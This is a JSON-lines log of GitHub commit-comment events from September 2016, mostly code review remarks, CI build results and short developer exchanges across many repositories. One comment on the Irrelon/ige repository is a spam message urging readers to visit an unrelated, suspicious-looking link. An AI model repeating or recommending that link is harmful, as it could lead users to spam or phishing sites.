{"id":"4503663117","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18866517,"position":null,"line":null,"path":null,"commit_id":"465fa52c6803bb327b337f4b225ddb95fefe05cd","created_at":"2016-09-01T16:28:55Z","updated_at":"2016-09-01T16:28:55Z","body":"We may need to do something about the message ID, I don't know what it's used for, I thought it was supposed to be for the packet id? That is going to be automated, so the user doesn't need to specify it manually."}},"created_at":"2016-09-01T16:28:55Z"}
{"id":"4503664352","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18866520,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-01T16:29:09Z","updated_at":"2016-09-01T16:29:09Z","body":"Because it was inconsistent between drivers, and our docs have always said that we don't return anything."}},"created_at":"2016-09-01T16:29:09Z"}
{"id":"4503664984","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18866521,"position":null,"line":null,"path":null,"commit_id":"465fa52c6803bb327b337f4b225ddb95fefe05cd","created_at":"2016-09-01T16:29:16Z","updated_at":"2016-09-01T16:29:16Z","body":"However, we can do something to let the user manually change that if you want?"}},"created_at":"2016-09-01T16:29:16Z"}
{"id":"4503667297","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866526,"position":null,"line":null,"path":null,"commit_id":"8baa7eab8aa8ecaab96ce06d81cf1e57b4956caa","created_at":"2016-09-01T16:29:42Z","updated_at":"2016-09-01T16:29:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 899](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12301&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T16:29:42Z"}
{"id":"4503670883","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18866536,"position":96,"line":446,"path":"TX.h","commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T16:30:22Z","updated_at":"2016-09-01T16:30:22Z","body":"Ah thats stupid, sorry I wasn't aware of that.\r\nI'm not 100% sure this will work, but I would be willing to spend some time to hack something together as proof of concept. If it can work, it's worth effort!"}},"created_at":"2016-09-01T16:30:22Z"}
{"id":"4503675291","type":"CommitCommentEvent","actor":{"login":"Folco1975"},"repo":{"name":"Irrelon/ige"},"payload":{"comment":{"id":18866544,"position":null,"line":null,"path":null,"commit_id":"95701e0b57f07d95bbdd068c8299b3fe196ea95e","created_at":"2016-09-01T16:31:09Z","updated_at":"2016-09-01T16:31:09Z","body":"Hey! \n\nI'm so excited to  tell you  about that new great things that I've just seen here <http://ntecutusto.zoesgeorge.com/e4ybq>\n\nHugs, stefano.santosabato\n\n\n"}},"created_at":"2016-09-01T16:31:09Z"}
{"id":"4503676174","type":"CommitCommentEvent","actor":{"login":"offl"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18866545,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T16:31:18Z","updated_at":"2016-09-01T16:31:18Z","body":"This is the most common bug, when creatures uses triggered spell instead of [spell, which triggers that spell](http://www.wowhead.com/spell=34446/arcane-missiles). Always need to check if used spell can be triggered by other spell(via Wowhead or DBC)."}},"created_at":"2016-09-01T16:31:18Z"}
{"id":"4503676406","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":18866546,"position":null,"line":null,"path":null,"commit_id":"5ebac669e7163a7bf205baea2a2a84c992e2503e","created_at":"2016-09-01T16:31:21Z","updated_at":"2016-09-01T16:31:21Z","body":"This commit delivery this views.\r\n\r\n![kytos-nexus](https://cloud.githubusercontent.com/assets/32010/18175589/415f2814-7048-11e6-91bc-31bb5314fe91.png)\r\n![kytos-ipad](https://cloud.githubusercontent.com/assets/32010/18175599/48730e68-7048-11e6-8b9a-be410ffa81eb.png)\r\n![kytos-notebook](https://cloud.githubusercontent.com/assets/32010/18175600/488e0e84-7048-11e6-98ee-334a90240044.png)\r\n![kytos-desktop](https://cloud.githubusercontent.com/assets/32010/18175601/48940a46-7048-11e6-8ceb-a1c1c8cec276.png)\r\n"}},"created_at":"2016-09-01T16:31:21Z"}
{"id":"4503677775","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"tbongiorno1/GOTquiz"},"payload":{"comment":{"id":18866551,"position":43,"line":43,"path":"app.js","commit_id":"31a9bf7fba84139f5fa02daa623f9668a2fd2935","created_at":"2016-09-01T16:31:35Z","updated_at":"2016-09-01T16:31:35Z","body":"Which are we rendering here?"}},"created_at":"2016-09-01T16:31:35Z"}
{"id":"4503679657","type":"CommitCommentEvent","actor":{"login":"dweber019"},"repo":{"name":"w3tecch/aurelia-ts-boilerplate"},"payload":{"comment":{"id":18866555,"position":null,"line":null,"path":null,"commit_id":"bca4fc25945919e96612c656a70a4e8eb1a62865","created_at":"2016-09-01T16:31:57Z","updated_at":"2016-09-01T16:31:57Z","body":"Cordova and travis are done"}},"created_at":"2016-09-01T16:31:57Z"}
{"id":"4503679966","type":"CommitCommentEvent","actor":{"login":"StefanoD"},"repo":{"name":"rust-lang/libc"},"payload":{"comment":{"id":18866556,"position":4,"line":1582,"path":"src/redox.rs","commit_id":"94f495d131e168bc4e4234dbea48196db5303753","created_at":"2016-09-01T16:32:00Z","updated_at":"2016-09-01T16:32:00Z","body":"Are you sure, you want the same constant value like IP_DROP_MEMBERSHIP: ::c_int?"}},"created_at":"2016-09-01T16:32:00Z"}
{"id":"4503683067","type":"CommitCommentEvent","actor":{"login":"dweber019"},"repo":{"name":"w3tecch/aurelia-ts-boilerplate"},"payload":{"comment":{"id":18866559,"position":null,"line":null,"path":null,"commit_id":"5ff855263895baa2e9bf6ed69fe8cdb3e77f43c0","created_at":"2016-09-01T16:32:36Z","updated_at":"2016-09-01T16:32:36Z","body":"There isn't any thing like global services"}},"created_at":"2016-09-01T16:32:36Z"}
{"id":"4503683388","type":"CommitCommentEvent","actor":{"login":"sean-duffy"},"repo":{"name":"dronesoc/website"},"payload":{"comment":{"id":18866561,"position":null,"line":null,"path":null,"commit_id":"1a78c731294f5be3a0aeaa73477657e9190497d4","created_at":"2016-09-01T16:32:39Z","updated_at":"2016-09-01T16:32:39Z","body":"Is this inner directory needed or should I move everything up a level?"}},"created_at":"2016-09-01T16:32:39Z"}
{"id":"4503683497","type":"CommitCommentEvent","actor":{"login":"mmd-osm"},"repo":{"name":"drolbr/Overpass-API"},"payload":{"comment":{"id":18866562,"position":null,"line":null,"path":null,"commit_id":"c926fbd83ffa5900a90a21654f225a4d2fcdf235","created_at":"2016-09-01T16:32:41Z","updated_at":"2016-09-01T16:32:41Z","body":"That parameter is really independent of `HAVE_LZ4`. You can set `--map-compression-method=gz` even without compiled-in lz4 support. "}},"created_at":"2016-09-01T16:32:41Z"}
{"id":"4503690172","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18866576,"position":83,"line":256,"path":"XMonad/Hooks/ManageDocks.hs","commit_id":"a5e87e38940190a363ee7b90595816e74e468488","created_at":"2016-09-01T16:33:54Z","updated_at":"2016-09-01T16:33:54Z","body":"@liskin \r\n> it's quite likely that sset/nsset are invalid as well\r\n\r\nI can't find where it's set wrong.\r\n\r\n> Isn't this what makes 28e9f8b necessary?\r\n\r\nNo. I've told what makes it necessary in comments to that commit."}},"created_at":"2016-09-01T16:33:54Z"}
{"id":"4503699376","type":"CommitCommentEvent","actor":{"login":"stuckless"},"repo":{"name":"OpenSageTV/sagetv-plugin-repo"},"payload":{"comment":{"id":18866586,"position":null,"line":null,"path":null,"commit_id":"e4e9dd9fc3862b05aae700ec18fcb8ccbafc9a31","created_at":"2016-09-01T16:35:30Z","updated_at":"2016-09-01T16:35:30Z","body":"BTW... Last night I did the pull request from my phone, and I quickly reviewed the XML but I totally forgot to check that those were in their own plugin xml files :("}},"created_at":"2016-09-01T16:35:30Z"}
{"id":"4503701906","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18866594,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-01T16:35:57Z","updated_at":"2016-09-01T16:35:57Z","body":"Ok, thanks."}},"created_at":"2016-09-01T16:35:57Z"}
{"id":"4503702282","type":"CommitCommentEvent","actor":{"login":"Ptival"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":18866597,"position":null,"line":null,"path":null,"commit_id":"6cbb327b7678a9c7050e7cacaa1ca2cf751c08ae","created_at":"2016-09-01T16:36:01Z","updated_at":"2016-09-01T16:36:01Z","body":"Neat."}},"created_at":"2016-09-01T16:36:01Z"}
{"id":"4503704236","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"tbongiorno1/GOTquiz"},"payload":{"comment":{"id":18866601,"position":10,"line":10,"path":"app.js","commit_id":"31a9bf7fba84139f5fa02daa623f9668a2fd2935","created_at":"2016-09-01T16:36:22Z","updated_at":"2016-09-01T16:36:22Z","body":"Rather than having these all listed in your paramater list here... might you consider using an object here?  \r\n\r\nFor example:\r\n\r\nInstead of:\r\n```js\r\nconstructor(name, age, favoriteFoodOne, favoriteFoodTwo)\r\n```\r\n\r\n... could we use something more like:\r\n\r\n```js\r\nclass Person {\r\n  constructor({ name, age, favoriteFoods }) {\r\n    this.name = name;\r\n    this.age = age;\r\n    this.favoriteFoods = favoriteFoods;\r\n  }\r\n}\r\n\r\nnew Person({\r\n  name: 'lichard',\r\n  age: 3,\r\n  favoriteFoods: [\r\n    'fruit',\r\n    'veggies',\r\n    'banananana',\r\n  ],\r\n})\r\n```\r\n"}},"created_at":"2016-09-01T16:36:22Z"}
{"id":"4503706822","type":"CommitCommentEvent","actor":{"login":"ablx"},"repo":{"name":"Saftophobia/graph-viz-eye-tracker"},"payload":{"comment":{"id":18866610,"position":null,"line":null,"path":null,"commit_id":"1ab45c615832bb621b44c572cd05fd05c3980006","created_at":"2016-09-01T16:36:52Z","updated_at":"2016-09-01T16:36:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MLX5zxSF&#x2F;36-filter-the-data-so-that-the-graph-looks-better\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Filter the data so that the graph looks better</a>"}},"created_at":"2016-09-01T16:36:52Z"}
{"id":"4503706926","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18866611,"position":null,"line":null,"path":null,"commit_id":"168b8cadf799c78ecf898d0a26c91f5eaa1f9004","created_at":"2016-09-01T16:36:53Z","updated_at":"2016-09-01T16:36:53Z","body":"Seen, nice."}},"created_at":"2016-09-01T16:36:53Z"}
{"id":"4503707506","type":"CommitCommentEvent","actor":{"login":"ablx"},"repo":{"name":"Saftophobia/graph-viz-eye-tracker"},"payload":{"comment":{"id":18866612,"position":null,"line":null,"path":null,"commit_id":"33579d0e21b115dff0d38f0d4f9c3b6762bc43b8","created_at":"2016-09-01T16:37:00Z","updated_at":"2016-09-01T16:37:00Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MLX5zxSF&#x2F;36-filter-the-data-so-that-the-graph-looks-better\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Filter the data so that the graph looks better</a>"}},"created_at":"2016-09-01T16:37:00Z"}
{"id":"4503707949","type":"CommitCommentEvent","actor":{"login":"ablx"},"repo":{"name":"Saftophobia/graph-viz-eye-tracker"},"payload":{"comment":{"id":18866613,"position":null,"line":null,"path":null,"commit_id":"d4b16404e57ad5d9cb9cafd96dbd1352254ca000","created_at":"2016-09-01T16:37:07Z","updated_at":"2016-09-01T16:37:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MLX5zxSF&#x2F;36-filter-the-data-so-that-the-graph-looks-better\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Filter the data so that the graph looks better</a>"}},"created_at":"2016-09-01T16:37:07Z"}
{"id":"4503708052","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"joshlw04/battleship"},"payload":{"comment":{"id":18866614,"position":3,"line":3,"path":"JS/Cell.js","commit_id":"688866d5c776b49b27ad9f0d0e16ca4379217369","created_at":"2016-09-01T16:37:08Z","updated_at":"2016-09-01T16:37:08Z","body":"That makes sense!  Let's look over at the game object for that"}},"created_at":"2016-09-01T16:37:08Z"}
{"id":"4503708077","type":"CommitCommentEvent","actor":{"login":"Sbelletier"},"repo":{"name":"Sbelletier/Petits-Commits-Entre-Amis"},"payload":{"comment":{"id":18866615,"position":null,"line":null,"path":null,"commit_id":"1485caeee5a8534ee02343929bc66384104d1472","created_at":"2016-09-01T16:37:08Z","updated_at":"2016-09-01T16:37:08Z","body":"Quelqu'un a fait une boulette"}},"created_at":"2016-09-01T16:37:08Z"}
{"id":"4503708213","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18866616,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T16:37:09Z","updated_at":"2016-09-01T16:37:09Z","body":"Congrats!"}},"created_at":"2016-09-01T16:37:09Z"}
{"id":"4503708448","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866617,"position":null,"line":null,"path":null,"commit_id":"8baa7eab8aa8ecaab96ce06d81cf1e57b4956caa","created_at":"2016-09-01T16:37:11Z","updated_at":"2016-09-01T16:37:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 899](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12301&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:29\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T16:37:11Z"}
{"id":"4503709868","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18866619,"position":7,"line":278,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-01T16:37:26Z","updated_at":"2016-09-01T16:37:26Z","body":"yes, I think \"expand\" is the best option too.\r\n"}},"created_at":"2016-09-01T16:37:26Z"}
{"id":"4503712044","type":"CommitCommentEvent","actor":{"login":"Ptival"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":18866625,"position":null,"line":null,"path":null,"commit_id":"6cbb327b7678a9c7050e7cacaa1ca2cf751c08ae","created_at":"2016-09-01T16:37:52Z","updated_at":"2016-09-01T16:37:52Z","body":"Neat."}},"created_at":"2016-09-01T16:37:52Z"}
{"id":"4503712454","type":"CommitCommentEvent","actor":{"login":"VolterPL"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18866626,"position":null,"line":null,"path":null,"commit_id":"cadf4bb10e5a8a05d8627e4ecc37543a5db00c8c","created_at":"2016-09-01T16:37:57Z","updated_at":"2016-09-01T16:37:57Z","body":"[ISO C90 forbids mixed declarations and code in C](http://stackoverflow.com/questions/13291353/iso-c90-forbids-mixed-declarations-and-code-in-c)\r\nand\r\n[C: warning: X may be used uninitialized in this function](http://stackoverflow.com/questions/12958931/c-warning-x-may-be-used-uninitialized-in-this-function)\r\n"}},"created_at":"2016-09-01T16:37:57Z"}
{"id":"4503714114","type":"CommitCommentEvent","actor":{"login":"frangarcj"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":18866635,"position":null,"line":null,"path":null,"commit_id":"fea033268ac8beb475b2918a8a1a41219a15f599","created_at":"2016-09-01T16:38:16Z","updated_at":"2016-09-01T16:38:16Z","body":"Not on latest sdk"}},"created_at":"2016-09-01T16:38:16Z"}
{"id":"4503714437","type":"CommitCommentEvent","actor":{"login":"dannmartens"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18866637,"position":120,"line":120,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-01T16:38:19Z","updated_at":"2016-09-01T16:38:19Z","body":"Thanks Ignacio! I would be more than happy to accept a pull request. But\ntruth be told, I would be even happier if we could settle on a solution\nwhich does not depend on Maven.\n\n\nOn Thu, Sep 1, 2016 at 11:17 AM Ignacio Baca Moreno-Torres <\nnotifications@github.com> wrote:\n\n> Most of the configuration in the war and gwt plugins can be omitted if you\n> use the new generation gwt-maven-plugin (tbroyer), the new plugin encourage\n> best practices and simplify configuration. It's strongly recommended, and\n> the old one should really never be used to new projects! In any case, it's\n> a really good example project, I'm just asking for help to promote the use\n> of the new plugin which is much better and solves lot of\n> bad-practices-problems related to the old one. I'll try to make a pull\n> request, but if you want, you can try it your self\n> https://tbroyer.github.io/gwt-maven-plugin/migrating.html. Thanks!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TOMOTON/gwt-dagger2/commit/6f49b5396941b12f5931220d14a42bcb0f1c0113#commitcomment-18860635>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAQD3fIQHCum7mtPC9adsliok4rxlYbYks5qlpgOgaJpZM4Jyebl>\n> .\n>\n"}},"created_at":"2016-09-01T16:38:19Z"}
{"id":"4503715483","type":"CommitCommentEvent","actor":{"login":"AKSHAT3272"},"repo":{"name":"AKSHAT3272/lab02"},"payload":{"comment":{"id":18866641,"position":51,"line":31,"path":"README.md","commit_id":"5f2a4201aabee8416224c58fe0f24cbd0f5e3878","created_at":"2016-09-01T16:38:31Z","updated_at":"2016-09-01T16:38:31Z","body":"void send(String pass)"}},"created_at":"2016-09-01T16:38:31Z"}
{"id":"4503715700","type":"CommitCommentEvent","actor":{"login":"NejcZdovc"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":18866642,"position":82,"line":76,"path":"src/app.module.ts","commit_id":"a1020982b89c86ae815aafbd2b453ecf05da8290","created_at":"2016-09-01T16:38:33Z","updated_at":"2016-09-01T16:38:33Z","body":"We need to optimize ng module. I think that we don't need to load all components in the main app. I would create multiple ng modules. I don't thing that ng module was created to be used like this."}},"created_at":"2016-09-01T16:38:33Z"}
{"id":"4503716626","type":"CommitCommentEvent","actor":{"login":"MikhailArkhipov"},"repo":{"name":"Microsoft/RTVS"},"payload":{"comment":{"id":18866647,"position":35,"line":112,"path":"src/R/Components/Impl/InteractiveWorkflow/Implementation/RInteractiveWorkflow.cs","commit_id":"e52124fac6645fe888e6d45d3dac98f50d8c9420","created_at":"2016-09-01T16:38:43Z","updated_at":"2016-09-01T16:38:43Z","body":"This needs to be checked against Attach To Process... scenario. In other cases user does have a project. Project-less debugging is either R or, I guess, attach to process."}},"created_at":"2016-09-01T16:38:43Z"}
{"id":"4503717145","type":"CommitCommentEvent","actor":{"login":"DIMkata"},"repo":{"name":"snide/sphinx_rtd_theme"},"payload":{"comment":{"id":18866650,"position":null,"line":null,"path":null,"commit_id":"26c82648c42bd422df48220cfbdbef36b4a165a6","created_at":"2016-09-01T16:38:49Z","updated_at":"2016-09-01T16:38:49Z","body":"BTC =0."}},"created_at":"2016-09-01T16:38:49Z"}
{"id":"4503718907","type":"CommitCommentEvent","actor":{"login":"mikemimik"},"repo":{"name":"mikemimik/collins"},"payload":{"comment":{"id":18866656,"position":null,"line":null,"path":null,"commit_id":"80e8f9371baba24d38b9ea861fb969af491fe529","created_at":"2016-09-01T16:39:10Z","updated_at":"2016-09-01T16:39:10Z","body":"fixes #17 "}},"created_at":"2016-09-01T16:39:10Z"}
{"id":"4503721903","type":"CommitCommentEvent","actor":{"login":"ButtSaira"},"repo":{"name":"ButtSaira/Test"},"payload":{"comment":{"id":18866665,"position":12,"line":12,"path":"sqeGit/WebForm1.aspx","commit_id":"3fe260eb1f5dd679749d760df3d2e29eecf41f80","created_at":"2016-09-01T16:39:46Z","updated_at":"2016-09-01T16:39:46Z","body":"hahahahahahahahahahahaha"}},"created_at":"2016-09-01T16:39:46Z"}
{"id":"4503721943","type":"CommitCommentEvent","actor":{"login":"hkdobrev"},"repo":{"name":"clippings/parsedown-provider"},"payload":{"comment":{"id":18866666,"position":null,"line":null,"path":null,"commit_id":"7e062021afcd921d8b3d9aa1157cb7cb2e4275e7","created_at":"2016-09-01T16:39:46Z","updated_at":"2016-09-01T16:39:46Z","body":"@erusev This is the documented way of testing Twig extensions, filters etc. You can read more about it here - http://twig.sensiolabs.org/doc/advanced.html#testing-an-extension\r\n\r\nHowever the format is not developed by Twig themselves. It is somewhat popular in the PHP community, because PHP itself uses it for its so-called `phpt` testsuite. I think there are other libraries adopting it after PHP tests and then Twig did the same."}},"created_at":"2016-09-01T16:39:46Z"}
{"id":"4503722793","type":"CommitCommentEvent","actor":{"login":"wesleytodd"},"repo":{"name":"hegemonic/taffydb"},"payload":{"comment":{"id":18866670,"position":null,"line":null,"path":null,"commit_id":"507d2d75fa16e1386f6d50abee1894b264d4458b","created_at":"2016-09-01T16:39:57Z","updated_at":"2016-09-01T16:39:57Z","body":"This needs to be undone.  We cant npm install because of it.  Please also consider not pointing your production npm dependencies to github repos.  Especially not for projects that the entire internet depends on like jsdoc :)\r\n\r\nI imaging that this commit broke more people than the leftpad unpublish lol."}},"created_at":"2016-09-01T16:39:57Z"}
{"id":"4503723186","type":"CommitCommentEvent","actor":{"login":"sbellity"},"repo":{"name":"hull-ships/hull-mailchimp"},"payload":{"comment":{"id":18866672,"position":29,"line":222,"path":"server/lib/sync-agent.js","commit_id":"d4dfecd20aa7543c7a9a3b7d1521737a79d6c404","created_at":"2016-09-01T16:40:02Z","updated_at":"2016-09-01T16:40:02Z","body":"Meybe we could start with a higher value ;)"}},"created_at":"2016-09-01T16:40:02Z"}
{"id":"4503723738","type":"CommitCommentEvent","actor":{"login":"ddruker"},"repo":{"name":"processprocess/gameFolder"},"payload":{"comment":{"id":18866676,"position":null,"line":null,"path":null,"commit_id":"7d65adbacc83a159999d9601cdc71ffc33060a20","created_at":"2016-09-01T16:40:10Z","updated_at":"2016-09-01T16:40:10Z","body":"This commit looks good.  I would go more with something like \"create basic hover and destroy animation and mechanic\".  "}},"created_at":"2016-09-01T16:40:10Z"}
{"id":"4503723783","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18866677,"position":null,"line":null,"path":null,"commit_id":"cf8b573df3aeb09c4819ad7ff92925858348960f","created_at":"2016-09-01T16:40:10Z","updated_at":"2016-09-01T16:40:10Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-118/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-01T16:40:10Z"}
{"id":"4503724133","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"joshlw04/battleship"},"payload":{"comment":{"id":18866678,"position":8,"line":8,"path":"JS/board.js","commit_id":"688866d5c776b49b27ad9f0d0e16ca4379217369","created_at":"2016-09-01T16:40:14Z","updated_at":"2016-09-01T16:40:14Z","body":"Rather than listing all these here, could you use a looping structor to fill this up?\r\n\r\nFor example:\r\n```js\r\nthings = Array(10).fill(null).map((ele, idx) => { return new Thing() } );\r\n```\r\n\r\nNot sure that's the code, but something like that might be helpful?\r\nCan you read through that a few times and describe to me what it's doing?\r\n\r\n\r\nBEFORE going down that path though, feel free to hard code it\r\n\r\n```js\r\nthis.gameStateArray = [new Cell(1), new Cell(0), new Cell(1), new Cell(1), new Cell(1)]\r\n```\r\n\r\nOne step at a time."}},"created_at":"2016-09-01T16:40:14Z"}
{"id":"4503726460","type":"CommitCommentEvent","actor":{"login":"DIMkata"},"repo":{"name":"snide/sphinx_rtd_theme"},"payload":{"comment":{"id":18866683,"position":null,"line":null,"path":null,"commit_id":"26c82648c42bd422df48220cfbdbef36b4a165a6","created_at":"2016-09-01T16:40:37Z","updated_at":"2016-09-01T16:40:37Z","body":"LEDGER=0 ????"}},"created_at":"2016-09-01T16:40:37Z"}
{"id":"4503727452","type":"CommitCommentEvent","actor":{"login":"michaloo"},"repo":{"name":"hull-ships/hull-mailchimp"},"payload":{"comment":{"id":18866687,"position":29,"line":222,"path":"server/lib/sync-agent.js","commit_id":"d4dfecd20aa7543c7a9a3b7d1521737a79d6c404","created_at":"2016-09-01T16:40:49Z","updated_at":"2016-09-01T16:40:49Z","body":"Oh, yeah, left that for further testing :)"}},"created_at":"2016-09-01T16:40:49Z"}
{"id":"4503729343","type":"CommitCommentEvent","actor":{"login":"ddruker"},"repo":{"name":"maxmarschark/Project-1"},"payload":{"comment":{"id":18866695,"position":null,"line":null,"path":null,"commit_id":"03f84c38d7fac41960a0db65b48415f5acc84c0d","created_at":"2016-09-01T16:41:12Z","updated_at":"2016-09-01T16:41:12Z","body":"Its good that your making detailed commits. I would make the commit something like \"add some html and css to project 1\".  Try saying \"this will\" in your head before you write the commit."}},"created_at":"2016-09-01T16:41:12Z"}
{"id":"4503732589","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/plinko-probability"},"payload":{"comment":{"id":18866710,"position":null,"line":null,"path":null,"commit_id":"13931fc79062945e3f71ad54b637561b9420008a","created_at":"2016-09-01T16:41:49Z","updated_at":"2016-09-01T16:41:49Z","body":"#64"}},"created_at":"2016-09-01T16:41:49Z"}
{"id":"4503735592","type":"CommitCommentEvent","actor":{"login":"jrbenito"},"repo":{"name":"zertrin/duplicity-backup"},"payload":{"comment":{"id":18866713,"position":null,"line":null,"path":null,"commit_id":"73adf5dc99f98c0129d1c12a155187a13e36541a","created_at":"2016-09-01T16:42:26Z","updated_at":"2016-09-01T16:42:26Z","body":"Fair enough! \r\n\r\nThanks! "}},"created_at":"2016-09-01T16:42:26Z"}
{"id":"4503736767","type":"CommitCommentEvent","actor":{"login":"nWidart"},"repo":{"name":"AsgardCms/Core"},"payload":{"comment":{"id":18866716,"position":45,"line":274,"path":"Providers/CoreServiceProvider.php","commit_id":"2bf887ca4b0e8f4af6436bbf00e6604b77828f91","created_at":"2016-09-01T16:42:40Z","updated_at":"2016-09-01T16:42:40Z","body":"Indeed thanks, changed it locally already. "}},"created_at":"2016-09-01T16:42:40Z"}
{"id":"4503736838","type":"CommitCommentEvent","actor":{"login":"ismayc"},"repo":{"name":"rstudio/bookdown"},"payload":{"comment":{"id":18866717,"position":null,"line":null,"path":null,"commit_id":"e3fd9861dcce1d398e60582d64a0afec36587c34","created_at":"2016-09-01T16:42:41Z","updated_at":"2016-09-01T16:42:41Z","body":"It appears that that error has cleared up with an `install.packages(\"bookdown\")` call, but I'm still not able to get different files to compile based on specifications in `_bookdown.yml`.  For instance, I have tried to get it to work with your `bookdown-demo` example and here are the only changes I have made to that in the `_bookdown.yml` file:\r\n\r\n```\r\nbook_filename: \"bookdown-demo\"\r\nchapter_name: \"Chapter \"\r\nrmd_files:\r\n  html: [\"index.Rmd\", \"01-intro.Rmd\", \"02-literature.Rmd\", \"06-references.Rmd\"]\r\n  latex: [\"index.Rmd\", \"03-method.Rmd\", \"04-application.Rmd\", \"05-summary.Rmd\", \"06-references.Rmd\"]\r\n```\r\n\r\nWhen I press **Build Book** it compiles all of the chapters for both options instead of only using the files specified."}},"created_at":"2016-09-01T16:42:41Z"}
{"id":"4503736903","type":"CommitCommentEvent","actor":{"login":"ddruker"},"repo":{"name":"desaibh/game-project"},"payload":{"comment":{"id":18866718,"position":null,"line":null,"path":null,"commit_id":"aae927f5d3d52044282fb53b0b0a86fddc84caf0","created_at":"2016-09-01T16:42:41Z","updated_at":"2016-09-01T16:42:41Z","body":"I like that you're committing frequently but please keep them VERY detailed.  Try using the sentence \"this will\" before the commit.  \"this will\"(in your head) commit -m \"add the check for row match functionality\"."}},"created_at":"2016-09-01T16:42:41Z"}
{"id":"4503741144","type":"CommitCommentEvent","actor":{"login":"AKSHAT3272"},"repo":{"name":"AKSHAT3272/lab02"},"payload":{"comment":{"id":18866728,"position":59,"line":37,"path":"README.md","commit_id":"5f2a4201aabee8416224c58fe0f24cbd0f5e3878","created_at":"2016-09-01T16:43:27Z","updated_at":"2016-09-01T16:43:27Z","body":"* an object can implement as many interfaces as needed"}},"created_at":"2016-09-01T16:43:27Z"}
